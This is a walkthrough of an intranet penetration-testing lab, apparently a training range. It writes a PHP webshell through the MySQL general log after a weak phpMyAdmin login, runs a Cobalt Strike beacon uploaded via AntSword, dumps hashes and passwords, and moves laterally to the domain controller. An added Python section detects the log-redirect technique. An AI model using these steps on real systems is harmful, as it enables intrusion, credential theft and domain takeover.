Network configuration
Win7 serves as the web server; the other two machines sit on the intranet and can reach each other.
win7
It has two network adapters: one on VM13 for the internal network, and one on NAT for access to the external network.
win 2008
win 2K3
IP allocation
(address screenshots of each host: win7 extranet and intranet adapters, win 2008, win 2K3, kali)

| Host | IP |
| --- | --- |
| win7 (extranet) | 192.168.109.134 |
| win7 (intranet) | 192.168.52.143 |
| win 2008 | 192.168.52.138 |
| win 2K3 | 192.168.52.141 |
| kali | 192.168.109.132 |
| Host | 192.168.109.1 |
You can see that kali and win7 are on the same physical network.
Interoperability
From the host, ping each of the three intranet machines.
The connectivity is as follows:
win7 pings the intranet hosts
The result is as follows:
You can see that the hosts on the internal network are communicating with each other, but the external network cannot access the internal network.
Starting the service
Open phpStudy on win7
Open it in the browser
Access 192.168.109.194 from the host's browser
Discovering the target
Kali ships with arp-scan. It discovers the hosts on the same network segment as your own network card.
arp-scan -l # Scan all hosts on the local network segment
arp-scan -I eth0 -l # Scan all hosts on the segment of the specified interface
Run it with root privileges to quickly discover hosts on the same network segment.
Scanning directories
Scanning the directory with Edgeworth shows the following:
Entering phpMyAdmin
Click the URL above to open it
Log in with the weak password root/root
Here we use the MySQL general log, via phpMyAdmin, to write the shell. First check whether the log is enabled.
The conditions for writing are as follows:
- root privileges
- the absolute path of the web root is known
- secure_file_priv has no specific value (it is empty)
show global variables like '%secure%'; # check these settings
You can see that the log is not turned on, and secure_file_priv has no specific value.
Next, turn on the log and point it at the absolute path
set global general_log="on";
# Turn on the general log
set global general_log_file="C:/phpStudy/WWW/1.php";
# Change the log path (the absolute path was leaked by the phpinfo.php mentioned above)
Write a one-sentence Trojan (a one-line webshell)
SELECT ”
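As an added defender-side example (not code from the original write-up), the check below evaluates the three preconditions listed above against a server's global variables and scans MySQL general-log lines for a `SET GLOBAL general_log_file` that redirects the log into the web root. The web root `C:/phpStudy/WWW` is taken from the page; the variable dictionary and log lines are constructed sample data.

```python
import re

# Web root seen on this page (phpStudy default); add others for your deployment.
WEB_ROOTS = ["C:/phpStudy/WWW"]
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")

def _norm(path):
    # Normalise separators and case so prefix checks work for Windows paths.
    return path.replace("\\", "/").strip().lower()

def under_web_root(path):
    p = _norm(path)
    return any(p.startswith(_norm(r).rstrip("/") + "/") for r in WEB_ROOTS)

def audit_mysql_variables(variables):
    """Report which of the page's preconditions a server's globals satisfy."""
    findings = []
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: file paths are unrestricted")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON")
    log_file = variables.get("general_log_file", "")
    if under_web_root(log_file) or _norm(log_file).endswith(SCRIPT_EXT):
        findings.append("general_log_file points at a web-served script: " + log_file)
    return findings

# Matches SET GLOBAL general_log_file = '...' / "..." (curly quotes included).
SET_LOG_FILE = re.compile(
    r"set\s+global\s+general_log_file\s*=\s*['\"\u201c\u201d]?([^'\"\u201c\u201d;]+)", re.I)

def detect_log_redirect(log_lines):
    """Return (line, path) for statements that move the general log under the web root."""
    hits = []
    for line in log_lines:
        m = SET_LOG_FILE.search(line)
        if m:
            path = m.group(1).strip()
            if under_web_root(path) or _norm(path).endswith(SCRIPT_EXT):
                hits.append((line, path))
    return hits

# Constructed sample data, not taken from the page's screenshots.
SAMPLE_VARS = {"secure_file_priv": "", "general_log": "ON", "general_log_file": r"C:\phpStudy\WWW\1.php"}
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z\t12 Query\tshow global variables like '%secure%'",
    "2024-01-01T10:00:05Z\t12 Query\tset global general_log=\"on\"",
    "2024-01-01T10:00:09Z\t12 Query\tset global general_log_file=\"C:/phpStudy/WWW/1.php\"",
    "2024-01-01T10:00:20Z\t13 Query\tset global general_log_file=\"C:/phpStudy/MySQL/data/mysql.log\"",
]
```

A server whose `secure_file_priv` is set to a data directory (or NULL) and whose log file stays outside the web root returns no findings from `audit_mysql_variables`.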
Connect using AntSword
Added successfully; you can then operate on the host
The commands that can be run are as follows:
whoami # View current username
whoami /all # Get domain SID
ipconfig /all # Network configuration
route print # Print routing information
arp -a # Check the ARP cache to find intranet hosts
systeminfo # Operating system information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # Operating system and software version information
systeminfo | findstr /B /C:"OS name" /C:"OS version" # Operating system and software version information (Chinese locale)
echo %PROCESSOR_ARCHITECTURE% # System architecture
wmic product get name,version # Installed software and version information
wmic service list brief # Local service information
tasklist /v # Local processes
net statistics workstation # Host boot time
schtasks /query /fo LIST /v # Scheduled tasks
net user # View local users
net localgroup administrators # View the local administrators group (usually includes domain users)
net user xxx # View detailed information for the specified user
Use CS (Cobalt Strike) to create a listener, then upload and run the Trojan
The host has already been connected with AntSword
Next, create a CS listener and then generate the Trojan file
Upload it with AntSword and launch it
Proceed as follows:
You can see that the creation was successful
Save it to the desktop
Upload it using AntSword
Click to upload the file and select the Trojan you just generated
You can see that the upload was successful
Now run shell.exe from the AntSword terminal.
You can see that the host comes online under the listener
Right-click and change the sleep interval
Information collection
Right-click to enter Beacon
shell hostname # query the host name
shell net users # view the user list
shell net config workstation # view the domain
shell net localgroup administrators # view domain administrators
shell net group "domain admins" /domain # view the domain controllers
View the list of all domain member computers
Find the domain administrator
net view # view the current domain list
After running it, click to see the hosts in the current domain.
Privilege escalation
First grab the server credentials
Click Dump Hash
Then grab the clear-text password
Use plug-ins (you can privately message me if you need plug-ins)
At this point you can see a SYSTEM * entry, which runs with SYSTEM (root-level) privileges
Lateral movement
Create an SMB listener
Move laterally: use the credentials just obtained to bring the domain controller online
Take down the domain controller, then use it to bring the remaining host online